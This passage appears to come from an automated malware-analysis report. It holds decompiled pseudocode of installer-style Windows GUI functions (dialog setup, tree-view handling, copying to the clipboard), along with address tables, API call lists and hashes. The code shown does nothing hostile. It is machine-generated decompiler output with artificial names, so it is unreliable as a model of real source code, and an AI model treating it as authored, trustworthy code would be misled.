										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}
































                                            0x00404ea9
                                            0x00404eaf
                                            0x00404eb8
                                            0x00404ebb
                                            0x00405048
                                            0x0040506c
                                            0x0040506c
                                            0x0040507f
                                            0x0040509c
                                            0x004050a3
                                            0x004050fa
                                            0x004050fe
                                            0x00000000
                                            0x00405105
                                            0x0040510d
                                            0x00405115
                                            0x00405118
                                            0x00405215
                                            0x00000000
                                            0x00405215
                                            0x0040511e
                                            0x00405124
                                            0x00405126
                                            0x00405127
                                            0x00405133
                                            0x00405139
                                            0x0040513f
                                            0x00405154
                                            0x0040515a
                                            0x00405141
                                            0x00405146
                                            0x0040514c
                                            0x0040514f
                                            0x0040514f
                                            0x00405168
                                            0x00405170
                                            0x00405173
                                            0x0040517c
                                            0x0040517f
                                            0x00405186
                                            0x0040518d
                                            0x00405195
                                            0x00405195
                                            0x004051ac
                                            0x004051ac
                                            0x004051b3
                                            0x004051b9
                                            0x004051c2
                                            0x004051c9
                                            0x004051d2
                                            0x004051d4
                                            0x004051d7
                                            0x004051e0
                                            0x004051ec
                                            0x004051ee
                                            0x004051f4
                                            0x004051f5
                                            0x004051f6
                                            0x004051fe
                                            0x00405209
                                            0x0040520f
                                            0x0040520f
                                            0x00000000
                                            0x00405173
                                            0x004050fe
                                            0x004050ab
                                            0x004050db
                                            0x004050e3
                                            0x004050ee
                                            0x004050ee
                                            0x004050f5
                                            0x00000000
                                            0x004050f5
                                            0x004050af
                                            0x004050b9
                                            0x00000000
                                            0x00405081
                                            0x00405087
                                            0x004050be
                                            0x00000000
                                            0x004050c7
                                            0x00405090
                                            0x00405095
                                            0x00405097
                                            0x00000000
                                            0x00405097
                                            0x0040507f
                                            0x00404ec1
                                            0x00404ec5
                                            0x00404ece
                                            0x00404ed5
                                            0x00404ed8
                                            0x00404edb
                                            0x00404ede
                                            0x00404edf
                                            0x00404ee0
                                            0x00404ef9
                                            0x00404efc
                                            0x00404f06
                                            0x00404f15
                                            0x00404f1d
                                            0x00404f25
                                            0x00404f2a
                                            0x00404f2d
                                            0x00404f39
                                            0x00404f42
                                            0x00404f4b
                                            0x00404f6e
                                            0x00404f74
                                            0x00404f85
                                            0x00404f8a
                                            0x00404f98
                                            0x00404fa6
                                            0x00404fa6
                                            0x00404fab
                                            0x00404fb9
                                            0x00404fb9
                                            0x00404fbe
                                            0x00404fc1
                                            0x00404fc6
                                            0x00404fd2
                                            0x00404fdb
                                            0x00404fe8
                                            0x00404ff7
                                            0x00404fea
                                            0x00404fef
                                            0x00404fef
                                            0x00404fe8
                                            0x0040500c
                                            0x00405015
                                            0x0040501e
                                            0x0040502e
                                            0x0040503a
                                            0x0040503a
                                            0x00000000

                                            APIs
                                            • GetDlgItem.USER32 ref: 00404EFF
                                            • GetDlgItem.USER32 ref: 00404F0E
                                            • GetDlgItem.USER32 ref: 00404F1D
                                              • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                            • GetClientRect.USER32 ref: 00404F4B
                                            • GetSystemMetrics.USER32 ref: 00404F53
                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                            • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                            • GetDlgItem.USER32 ref: 00405005
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                            • GetDlgItem.USER32 ref: 00405057
                                            • CreateThread.KERNEL32 ref: 00405065
                                            • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                            • ShowWindow.USER32(00000000), ref: 00405090
                                            • ShowWindow.USER32(?,00000008), ref: 00405095
                                            • ShowWindow.USER32(00000008), ref: 004050DB
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                            • CreatePopupMenu.USER32 ref: 0040511E
                                            • AppendMenuA.USER32 ref: 00405133
                                            • GetWindowRect.USER32 ref: 00405146
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                            • OpenClipboard.USER32(00000000), ref: 004051B3
                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                            • GlobalLock.KERNEL32 ref: 004051CC
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                            • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                            • SetClipboardData.USER32 ref: 00405209
                                            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                            • String ID: {
                                            • API String ID: 1050754034-366298937
                                            • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                            • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                            • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                            • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                            0x004046c5
                                            0x004046cb
                                            0x004046cd
                                            0x004046d3
                                            0x004046d9
                                            0x004046e6
                                            0x004046ef
                                            0x004046f2
                                            0x004046f5
                                            0x00404916
                                            0x0040491d
                                            0x00404931
                                            0x0040491f
                                            0x00404921
                                            0x00404924
                                            0x00404925
                                            0x0040492c
                                            0x0040492c
                                            0x0040493d
                                            0x0040494b
                                            0x0040494e
                                            0x00404964
                                            0x004049dc
                                            0x004049df
                                            0x004049e1
                                            0x004049eb
                                            0x004049f9
                                            0x004049f9
                                            0x004049fb
                                            0x00404a05
                                            0x00404a0b
                                            0x00404a2c
                                            0x00404a0d
                                            0x00404a1a
                                            0x00404a1a
                                            0x00404a0b
                                            0x00404a05
                                            0x00000000
                                            0x004049df
                                            0x00404969
                                            0x00404974
                                            0x00404979
                                            0x00404980
                                            0x00404987
                                            0x00404991
                                            0x00404991
                                            0x00404995
                                            0x0040499a
                                            0x0040499f
                                            0x004049b5
                                            0x004049a1
                                            0x004049a1
                                            0x004049a9
                                            0x004049b0
                                            0x004049ab
                                            0x004049ab
                                            0x004049ab
                                            0x004049a9
                                            0x004049b9
                                            0x004049bb
                                            0x004049c9
                                            0x004049ca
                                            0x004049d6
                                            0x004049d9
                                            0x004049d9
                                            0x0040499a
                                            0x00000000
                                            0x00404987
                                            0x0040496b
                                            0x00404972
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404a2f
                                            0x00404a2f
                                            0x00404a36
                                            0x00404aaa
                                            0x00404ab1
                                            0x00404abd
                                            0x00404abd
                                            0x00404ac6
                                            0x00404ac8
                                            0x00404acf
                                            0x00404ad2
                                            0x00404ad2
                                            0x00404ad8
                                            0x00404adf
                                            0x00404ae2
                                            0x00404ae2
                                            0x00404ae8
                                            0x00404aee
                                            0x00404af4
                                            0x00404af4
                                            0x00404b01
                                            0x00404c4e
                                            0x00404c55
                                            0x00404c72
                                            0x00404c78
                                            0x00404c8a
                                            0x00404c8a
                                            0x00000000
                                            0x00404b07
                                            0x00404b09
                                            0x00404b11
                                            0x00404b15
                                            0x00404b15
                                            0x00404b1d
                                            0x00404b5e
                                            0x00404b60
                                            0x00404b70
                                            0x00404b73
                                            0x00404b78
                                            0x00404b7f
                                            0x00404b82
                                            0x00404c24
                                            0x00404c2a
                                            0x00404c38
                                            0x00404c49
                                            0x00404c49
                                            0x00000000
                                            0x00404c38
                                            0x00404b88
                                            0x00404b8b
                                            0x00404b91
                                            0x00404b96
                                            0x00404b98
                                            0x00404b9a
                                            0x00404ba0
                                            0x00404ba7
                                            0x00404bac
                                            0x00404bb3
                                            0x00404bb6
                                            0x00404bb6
                                            0x00404bbd
                                            0x00404bc9
                                            0x00404bcd
                                            0x00404bcf
                                            0x00404bcf
                                            0x00404bbf
                                            0x00404bc1
                                            0x00404bc1
                                            0x00404bef
                                            0x00404bfb
                                            0x00404c0a
                                            0x00404c0a
                                            0x00404c0c
                                            0x00404c0f
                                            0x00404c18
                                            0x00000000
                                            0x00404b1f
                                            0x00404b2a
                                            0x00404b2d
                                            0x00404b32
                                            0x00404b34
                                            0x00404b38
                                            0x00404b48
                                            0x00404b52
                                            0x00404b54
                                            0x00404b57
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404b3a
                                            0x00404b3a
                                            0x00404b40
                                            0x00404b42
                                            0x00404b42
                                            0x00404b43
                                            0x00404b44
                                            0x00000000
                                            0x00404b3a
                                            0x00404b1d
                                            0x00404b01
                                            0x00404a3e
                                            0x00000000
                                            0x00404a54
                                            0x00404a5e
                                            0x00404a63
                                            0x00000000
                                            0x00000000
                                            0x00404a75
                                            0x00404a7a
                                            0x00404a86
                                            0x00404a86
                                            0x00404a88
                                            0x00404a97
                                            0x00404a99
                                            0x00404aa0
                                            0x00404aa3
                                            0x00000000
                                            0x00404aa3
                                            0x00404a3e
                                            0x004046fb
                                            0x00404700
                                            0x0040470a
                                            0x0040470b
                                            0x00404714
                                            0x0040471f
                                            0x0040473a
                                            0x0040474c
                                            0x00404751
                                            0x0040475c
                                            0x00404765
                                            0x0040477a
                                            0x0040478b
                                            0x00404798
                                            0x00404798
                                            0x0040479d
                                            0x004047a3
                                            0x004047a5
                                            0x004047a8
                                            0x004047ad
                                            0x004047b2
                                            0x004047b4
                                            0x004047b4
                                            0x004047b7
                                            0x004047b8
                                            0x004047d4
                                            0x004047d4
                                            0x004047d6
                                            0x004047d7
                                            0x004047dc
                                            0x004047df
                                            0x004047e2
                                            0x004047e6
                                            0x004047eb
                                            0x004047f0
                                            0x004047f4
                                            0x004047f9
                                            0x004047fe
                                            0x00404800
                                            0x00404808
                                            0x004048d2
                                            0x004048e5
                                            0x00000000
                                            0x0040480e
                                            0x00404811
                                            0x00404814
                                            0x00404817
                                            0x00404817
                                            0x0040481d
                                            0x00404823
                                            0x00404826
                                            0x0040482c
                                            0x0040482d
                                            0x00404832
                                            0x0040483b
                                            0x00404842
                                            0x00404845
                                            0x00404848
                                            0x0040484b
                                            0x00404887
                                            0x004048b0
                                            0x00404889
                                            0x00404896
                                            0x00404896
                                            0x0040484d
                                            0x00404850
                                            0x0040485f
                                            0x00404869
                                            0x00404871
                                            0x00404878
                                            0x00404880
                                            0x00404880
                                            0x0040484b
                                            0x004048b6
                                            0x004048b7
                                            0x004048c3
                                            0x004048c3
                                            0x004048d0
                                            0x004048eb
                                            0x004048ef
                                            0x0040490c
                                            0x00404911
                                            0x00404914
                                            0x00000000
                                            0x004048f1
                                            0x004048f6
                                            0x004048ff
                                            0x00404c8c
                                            0x00404c9e
                                            0x00404c9e
                                            0x004048ef
                                            0x00000000
                                            0x004048d0
                                            0x00404808

                                            APIs
                                            • GetDlgItem.USER32 ref: 004046BE
                                            • GetDlgItem.USER32 ref: 004046CB
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                            • LoadBitmapA.USER32 ref: 0040472A
                                            • SetWindowLongA.USER32 ref: 0040473D
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                            • DeleteObject.GDI32(?), ref: 0040479D
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                            • GetWindowLongA.USER32 ref: 004048D7
                                            • SetWindowLongA.USER32 ref: 004048E5
                                            • ShowWindow.USER32(?,00000005), ref: 004048F6
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                            • GlobalFree.KERNEL32 ref: 00404AE2
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                            • ShowWindow.USER32(?,00000000), ref: 00404C78
                                            • GetDlgItem.USER32 ref: 00404C83
                                            • ShowWindow.USER32(00000000), ref: 00404C8A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                            • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                            • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                            • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
